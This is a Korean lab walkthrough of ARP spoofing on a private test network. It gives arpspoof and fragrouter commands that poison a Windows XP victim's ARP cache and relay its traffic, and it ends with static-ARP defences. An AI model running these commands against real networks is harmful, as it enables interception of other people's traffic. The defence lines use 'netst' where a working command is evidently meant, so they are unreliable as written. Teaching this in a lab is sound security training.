ARP Spoofing

ARP(Address Resolution Protocol)

 

ARP Spoofing

 

실습환경

Kali#1 : 192.168.111.130 

Kali#2 : 192.168.111.131

WinXP : 192.168.111.140

 

01. WinXP에서 네이버 접속을 확인

 

02. WinXP에서 네트워크 설정 정보와 arp cache table 확인

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-fd-f9-c0     dynamic

 

03. Kali#2에서 WinXP에게 Gateway가 자신이라고 속임 (ARP Spoofing)

명령어 형식 ⇒ # arpspoof -i eth0 -t VICTIM_IP(WINXP) GATEWAY_IP
# arpspoof -i eth0 -t 192.168.111.140 192.168.111.2

 

04. WinXP에서 arp cache table 확인 ⇒ gateway의 mac 주소가 변경된 것을 확인

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-34-96-a1     dynamic
  192.168.111.131       00-50-56-34-96-a1     dynamic

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.111.140 --- 0x2
  Internet Address      Physical Address      Type
  192.168.111.2         00-50-56-34-96-a1     dynamic

 

05. WinXP에서 네이버로 접속이 되지 않는 것을 확인

 

06. Kali#2에서 fragrouter 명령으로 가로챈 네트워크 패킷을 라우팅

root@kali:~# fragrouter -B1

 

07. Kali#1에서 네이버 접속을 확인

 

08. Kali#2에서 Kali#1으로 arp spoofing, Kali#1에서 wireshark를 이용해서 arp 패킷을 확인 ⇒ destination mac이 잘못된 것을 확인

 

ARP Spoofing 방어

ARP cache table에 Gateway 등의 MAC 주소를 정적으로 설정

 

Windows

> arp -s GATEWAY_IP GATEWAY_MAC

 

> netst interface ip delete neighbors "NETWORK_CARD_NAME" "GATEWAY_IP"

> netst interface ip add neighbors "NETWORK_CARD_NAME" "GATEWAY_IP" "GATEWAY_MAC"